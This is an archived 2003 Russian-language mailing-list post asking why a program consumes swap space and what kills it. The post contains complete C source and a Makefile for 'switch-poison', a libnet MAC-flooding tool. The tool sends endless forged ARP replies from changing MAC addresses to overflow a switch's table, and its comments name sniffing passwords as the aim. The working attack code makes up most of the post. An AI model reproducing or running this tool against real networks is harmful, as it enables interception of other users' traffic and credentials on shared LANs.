From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: Date: Thu, 21 Aug 2003 10:30:01 +0400 From: "Oleg K. Artemjev" To: community@altlinux.ru Message-Id: <20030821103001.6e7c55f2.olli@rbauto.ru> X-Mailer: Sylpheed version 0.7.4 (GTK+ 1.2.10; i586-alt-linux) Mime-Version: 1.0 Content-Type: text/plain; charset=KOI8-R Content-Transfer-Encoding: 8bit Subject: [Comm] ?: =?koi8-r?b?0M/exc3VINzUwSDQ0s/H0sHNzcEg1tLF1A==?= swap w/ speed 1Mb/sec X-BeenThere: community@altlinux.ru X-Mailman-Version: 2.1.2 Precedence: list Reply-To: community@altlinux.ru List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 21 Aug 2003 06:29:05 -0000 Archived-At: List-Archive: List-Post: Hi. subj - на моем Master 2.0 нижевключенный код съедает по 1 метру свапа за одну-две секунды. Почему? ?-) И кто его потом прибивает? Я имею ввиду то, что не понятно, что убивает процесс переевший swap space - к вечеру от программы остается только надпись 'killed'. То есть, вероятно, это делает ядро, но от какой опции в menuconfig зависит такое поведение? ?-) Железо: [root@sky 2dig]# cat /proc/pci | tail -6 Bus 0, device 12, function 0: Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139 (rev 16). IRQ 11. Master Capable. Latency=32. Min Gnt=32.Max Lat=64. I/O at 0xd400 [0xd4ff]. Non-prefetchable 32 bit memory at 0xe4800000 [0xe48000ff]. [root@sky 2dig]# uname -a Linux sky.digger.org.ru 2.4.18-altlm2.0-custom #4 SMP Tue Jul 8 05:49:16 MSD 2003 i686 unknown [root@sky 2dig]# cat /proc/meminfo total: used: free: shared: buffers: cached: Mem: 95490048 92807168 2682880 0 12468224 31305728 Swap: 443072512 41533440 401539072 MemTotal: 93252 kB MemFree: 2620 kB MemShared: 0 kB Buffers: 12176 kB Cached: 18988 kB SwapCached: 11584 kB Active: 52632 kB Inactive: 23544 kB HighTotal: 0 kB HighFree: 0 kB LowTotal: 93252 kB LowFree: 2620 kB SwapTotal: 432688 kB SwapFree: 392128 kB [root@sky 2dig]# Код: /* * switch-poison.c - switching table poisoning - makes a * commutator beheve almost like a hub * with collission separation. * * This is a version especially adopted for commutators, * meaning for switching table overfilling. * * Please note, - w/ tcp sessions 1st packet sent via switch * contains session request & the second may then contain * an acknowledge & the 3d - a password, thus if you've not * enough bandwidth to refill all the switch commutation table * memory (i.e. all it cache memory) between two packets, * then you need some improvement for this code - all password * most probably will be sent in the 1st reply packet. There're * lot's of possible ways to do so - look at ettercap man * page for most usefull & easy way, or you may try dsmiff, or * there're more exotic ways. =) * * Based on arpoison v0.5 by Steve Buer - changed by * olli * * Changes: added a loop for src MAC changing, removed * commandline options - hardcoded are already best addresses, * if anyway wanna yours - recompile. * * ToDo: try to find most invisible way to overfill commutation * table. Possible vectors are: * * 1. Use layer 2 protocols that doesn't interfer w/ IP-based * stacks. I.e. use ETHERTYPE_LOOPBACK frames (man 3 libnet). * * 2. Use IPX or other stack that doesn't interfer with IP-based * stacks. * * Why: * * 1. It may be usefull, since it may easily allow network * investigation without injecting a sencible information. * * 2. Just for fun. * * BUGS: Current version eats swap space w/ a speed of 1Mb/sec on * my dual PPro200 w/ 96 RAM w/ no daemons running on 10Mbit/s on * Realtek 8139. At the end of avalible swap space it may be * killed by monitoring rules or you may get other results... * * * NO WARRANTY OF ANY KIND. * EDUCATION ONLY. * * * thanx2: all libnet developers, * Steve Buer, author of original arpoison, * Rserg . */ /* uncomment '#define debug 1' for reports on sent packets.*/ /* #define debug 1 */ #include #include #include #include void get_ip_addr(struct in_addr *, char *); int main(int argc, char *argv[]) { /* various variables */ int n, c, c0, c1, c2, c3, c4, c5; int packet_size = LIBNET_ETH_H + LIBNET_ARP_H; u_long SrcIP, DstIP; u_char *packet; u_char *device; char err_buf[LIBNET_ERRBUF_SIZE]; struct libnet_link_int *network; unsigned int p[6]; u_char DstHW[6]; u_char SrcHW[6]; /* parse args */ if (argc != 1) { printf("No opts supported."); printf("This 'll send lots of arp replies to MAC ff:ff:ff:ff:ff:ff,\n"); printf("from statically growing MAC with fromIP 224.0.0.1 &\n"); printf("destIP 224.0.0.1 via device eth0.\n"); printf("to change - change src & recompile."); exit(1); } /* assign predefined values */ DstIP = inet_addr("224.0.0.1"); SrcIP = inet_addr("224.0.0.1"); device = "eth0"; n = sscanf("ff:ff:ff:ff:ff:ff", "%x:%x:%x:%x:%x:%x", &p[0],&p[1],&p[2],&p[3],&p[4],&p[5]); for (c = 0;c < 6;c++) {DstHW[c] = p[c];} /* infinite loop - sending packets */ while (1) {/*let MAC grow*/ for (c0=0;c0<255;c0++) {SrcHW[0]=c0; for (c1=0;c1<255;c1++) {SrcHW[1]=c1; for (c2=0;c2<255;c2++) {SrcHW[2]=c2; for (c3=0;c3<255;c3++) {SrcHW[3]=c3; for (c4=0;c4<255;c4++) {SrcHW[4]=c4; for (c5=0;c5<255;c5++) {SrcHW[5]=c5; /* --------------Packet construction & sending-------------------- */ /* allocate memory for packet */ n = libnet_init_packet(packet_size, &packet); if(n != 1){printf("libnet_init_packet: error\n");exit(1);} /* ethernet header */ n = libnet_build_ethernet( DstHW, /* dst HW addr */ SrcHW, /* src HW addr */ 0x0806, /* ether packet type */ NULL, /* ptr to payload */ 0, /* payload size */ packet); /* ptr to packet memory */ if(n == -1){perror("libnet_build_ethernet"); exit(1);} /* ARP header */ n = libnet_build_arp( 1, /* hardware type */ 0x0800, /* proto type */ 6, /* hw addr size */ 4, /* proto addr size */ 2, /* ARP REPLY */ SrcHW, /* source HW addr */ (u_char *)&SrcIP, /* src proto addr */ DstHW, /* dst HW addr */ (u_char *)&DstIP, /* dst IP addr */ NULL, /* no payload */ 0, /* payload length */ packet + LIBNET_ETH_H); /* packet buffer memory */ if (n == -1) {perror("libnet_build_arp");exit(1);} /* open the link-layer interface */ network = libnet_open_link_interface(device, err_buf); if (network == NULL){perror("libnet_open_link_interface");exit(1);} /* inject the mofo !! */ n = libnet_write_link_layer(network,device,packet,packet_size); if (n < packet_size) {printf("libnet_write_link_layer only wrote %d of %d bytes\n",n, packet_size); } #ifdef debug /* output */ printf("ARP packet sent via %s\n", device); #endif /* Shut down the interface */ n = libnet_close_link_interface(network); if (n == -1){perror("libnet_close_link_interface");exit(1);} /* free packet memory */ libnet_destroy_packet(&packet); /*--------------Packet construction & sending--------------------*/ } /* for c5 */ } /* for c4 */ } /* for c3 */ } /* for c2 */ } /* for c1 */ } /* for c0 */ } /* while(1)*/ } Собирается так: ----------------------------------------------------------------------------------------------------- all: arpoison switch-poison clean: rm -f arpoison rm -f switch-poison arpoison: arpoison.c gcc -Wall `libnet-config --defines` arpoison.c -o arpoison `libnet-config --libs` switch-poison: switch-poison.c gcc -Wall `libnet-config --defines` switch-poison.c -o switch-poison `libnet-config --libs` install: cp -f arpoison switch-poison /hbin ----------------------------------------------------------------------------------------------------- -- Bye.Olli. http://olli.digger.org.ru